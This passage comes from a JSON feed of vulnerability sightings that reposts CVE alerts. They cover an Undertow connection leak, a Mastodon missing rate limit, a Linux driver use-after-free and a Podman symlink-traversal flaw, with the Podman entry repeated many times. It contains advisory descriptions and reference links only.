Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-02-27T10:40:09.662Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/security/cve/CVE-2024-1635\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-02-27T11:25:30.000000Z"}, {"uuid": "587c33eb-043f-4404-8024-ef02c23178f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V39F-C9JJ-8W7H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5720", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27157\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: Mastodon is a self-hosted, federated microblogging platform. Starting in version 4.2.0 and prior to versions 4.2.16 and 4.3.4, the rate limits are missing on `/auth/setup`. Without those rate limits, an attacker can craft requests that will send an email to an arbitrary addresses. Versions 4.2.16 and 4.3.4 fix the issue.\n\ud83d\udccf Published: 2025-02-27T17:12:39.043Z\n\ud83d\udccf Modified: 2025-02-27T17:12:39.043Z\n\ud83d\udd17 References:\n1. https://github.com/mastodon/mastodon/security/advisories/GHSA-v39f-c9jj-8w7h\n2. https://github.com/mastodon/mastodon/commit/06f879ce9bea195344ac9f71e6799eea500628ec", "creation_timestamp": "2025-02-27T17:25:14.000000Z"}, {"uuid": "1a887e77-cc5e-4ada-a5e9-38448054b4d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9926", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "5c89942c-99e8-4af3-b238-ead848299d7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8690", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "f3b95feb-c284-4bbd-bcc1-a65252f5c611", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8686", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "b4e7285b-329d-4201-ae3b-392607665054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2950", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5795", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4133\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A use-after-free vulnerability was found in the cxgb4 driver in the Linux kernel. The bug occurs when the cxgb4 device is detaching due to a possible rearming of the flower_stats_timer from the work queue. This flaw allows a local user to crash the system, causing a denial of service condition.\n\ud83d\udccf Published: 2023-08-03T14:32:12.421Z\n\ud83d\udccf Modified: 2025-02-27T21:11:13.168Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2394\n2. https://access.redhat.com/errata/RHSA-2024:2950\n3. https://access.redhat.com/errata/RHSA-2024:3138\n4. https://access.redhat.com/security/cve/CVE-2023-4133\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2221702", "creation_timestamp": "2025-02-27T21:25:56.000000Z"}, {"uuid": "04967da2-e8c5-4a3d-aa70-556984c1f63c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8418", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "e27c0513-7668-4c91-9ff8-7bc0a52d91b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8694", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "c0a1d4e8-b357-4971-8788-c3ae3570b452", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8700", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "db18905e-6af3-4159-9751-1a653e344ee6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8984", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "789dc17a-673c-4711-b734-1d3c402d2f25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9051", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "c46e37b9-af7f-4dab-b145-c09987c4037f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9454", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "b824cece-f1f0-472c-bd79-9a76010fe201", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8437", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "7c36209f-ee88-49e1-a0e5-4fbd4d1a30d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0876", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "d2fc203a-fa52-4d3a-9114-f4d2378052d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8428", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9676\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.\n\ud83d\udccf Published: 2024-10-15T15:27:33.665Z\n\ud83d\udccf Modified: 2025-02-27T16:57:02.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10289\n2. https://access.redhat.com/errata/RHSA-2024:8418\n3. https://access.redhat.com/errata/RHSA-2024:8428\n4. https://access.redhat.com/errata/RHSA-2024:8437\n5. https://access.redhat.com/errata/RHSA-2024:8686\n6. https://access.redhat.com/errata/RHSA-2024:8690\n7. https://access.redhat.com/errata/RHSA-2024:8694\n8. https://access.redhat.com/errata/RHSA-2024:8700\n9. https://access.redhat.com/errata/RHSA-2024:8984\n10. https://access.redhat.com/errata/RHSA-2024:9051\n11. https://access.redhat.com/errata/RHSA-2024:9454\n12. https://access.redhat.com/errata/RHSA-2024:9459\n13. https://access.redhat.com/errata/RHSA-2024:9926\n14. https://access.redhat.com/errata/RHSA-2025:0876\n15. 